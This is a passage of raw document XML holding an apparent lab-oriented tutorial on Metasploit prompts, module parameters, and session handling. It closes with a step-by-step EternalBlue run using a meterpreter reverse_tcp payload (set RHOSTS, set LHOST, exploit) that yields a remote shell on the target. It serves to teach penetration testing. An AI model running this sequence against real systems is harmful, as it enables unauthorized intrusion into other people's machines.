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Metasploit Parameters, Prompts, and Sessions – Detailed Explanation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. What to Do After Using a Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When you type: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use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You enter the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>module context</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Before running the exploit, you must </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>set parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The syntax is always: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set PARAMETER_NAME VALUE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set RHOSTS 10.10.165.39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Five Different Prompts in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This is a very important concept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(1) Regular Linux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root@ip-10-10-xx-xx:~#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Metasploit commands do not work here.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(2) msfconsole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msf6 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No module is selected yet.</w:t>
        <w:br/>
        <w:t>Only general commands work (search, use, sessions, etc.).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(3) Module Context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msf6 exploit(windows/smb/ms17_010_eternalblue) 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Now you are inside the exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Commands used here: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 options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exploit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(4) Meterpreter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meterpreter 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means the exploit was successful.</w:t>
        <w:br/>
        <w:t>The Meterpreter payload has been loaded on the target machine.</w:t>
        <w:br/>
        <w:t>You now control the target.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(5) Target Shell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C:\Windows\system32&gt;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is a normal Windows shell.</w:t>
        <w:br/>
        <w:t>Any command typed here runs on the target machine.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show options Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This command shows: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Which parameters are required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Which are optional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Which are already set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show options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Important field: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Required = yes → must be set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Required = no → optional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Important Parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>IP address of the target machine.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set RHOSTS 10.10.10.5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Supports CIDR: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set RHOSTS 10.10.10.0/24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From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0" w:name="code-block-viewer_Copy_10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr/>
        <w:t>set RHOSTS file:/root/targets.txt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RPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Target port number.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1" w:name="code-block-viewer_Copy_11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
        <w:t>set RPORT 445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If a web app runs on port 8080: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2" w:name="code-block-viewer_Copy_12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t>set RPORT 8080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PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Specifies which payload to use with the exploit.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3" w:name="code-block-viewer_Copy_13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr/>
        <w:t>set PAYLOAD windows/x64/meterpreter/reverse_tcp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LHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Your attacking machine’s IP address.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4" w:name="code-block-viewer_Copy_14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr/>
        <w:t>set LHOST 10.10.44.70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LPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Your listening port (for reverse shell).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5" w:name="code-block-viewer_Copy_15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
        <w:t>set LPORT 4444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SESSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Used in post-exploitation modules.</w:t>
        <w:br/>
        <w:t>Each successful exploit creates a session.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unset and unset all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To change a parameter: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6" w:name="code-block-viewer_Copy_16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr/>
        <w:t>set RHOSTS 10.10.10.10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To clear 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7" w:name="code-block-viewer_Copy_17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr/>
        <w:t>unset RHOSTS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To clear all parameters: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8" w:name="code-block-viewer_Copy_18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr/>
        <w:t>unset all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setg (Global Set)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Normal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> applies only to the current module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>setg</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> sets a global value.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9" w:name="code-block-viewer_Copy_19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr/>
        <w:t>setg RHOSTS 10.10.165.39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If you switch modules, RHOSTS will remain set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To remove global value: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0" w:name="code-block-viewer_Copy_20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr/>
        <w:t>unsetg RHOSTS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Running the Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Two ways to run a module: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1" w:name="code-block-viewer_Copy_21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr/>
        <w:t>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2" w:name="code-block-viewer_Copy_22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr/>
        <w:t>run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Both do the same thing.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exploit -z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3" w:name="code-block-viewer_Copy_23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr/>
        <w:t>exploit -z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Runs the exploit and sends the session to the background automatically.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Check Option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Some modules support: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4" w:name="code-block-viewer_Copy_24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr/>
        <w:t>check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only verifies whether the target is vulnerable.</w:t>
        <w:br/>
        <w:t>It does not exploit the target.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9. What Is a Session?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When an exploit is successful,</w:t>
        <w:br/>
        <w:t>a communication channel is created between Metasploit and the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This is called a session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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5" w:name="code-block-viewer_Copy_25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr/>
        <w:t>Meterpreter session 2 opened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10. Background a Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you are inside meterpreter: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6" w:name="code-block-viewer_Copy_26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr/>
        <w:t>meterpreter &gt; background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Or press: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7" w:name="code-block-viewer_Copy_27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr/>
        <w:t>CTRL + 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returns you to msfconsole.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11. List Sessions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8" w:name="code-block-viewer_Copy_28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr/>
        <w:t>sessions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Shows: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Session ID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Type (meterpreter/shell)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Target information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Connection details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12. Re-enter a Session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9" w:name="code-block-viewer_Copy_29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr/>
        <w:t>sessions -i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means:</w:t>
        <w:br/>
        <w:t>Interact with session number 2.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13. Complete Workflow (Simple Flow)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Open msfconsole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Search vulnerability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exploit/...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 options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RHOSTS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LHOST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payload (if required)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exploit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Session opens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sessions -i ID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Control via meterpreter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Simple Real Flow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0" w:name="code-block-viewer_Copy_30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr/>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>set RHOSTS 10.10.12.229</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>set LHOST 10.10.44.70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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If successful: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1" w:name="code-block-viewer_Copy_31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr/>
        <w:t>meterpreter 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2" w:name="code-block-viewer_Copy_32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr/>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>shell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2026-02-21T19:07:29Z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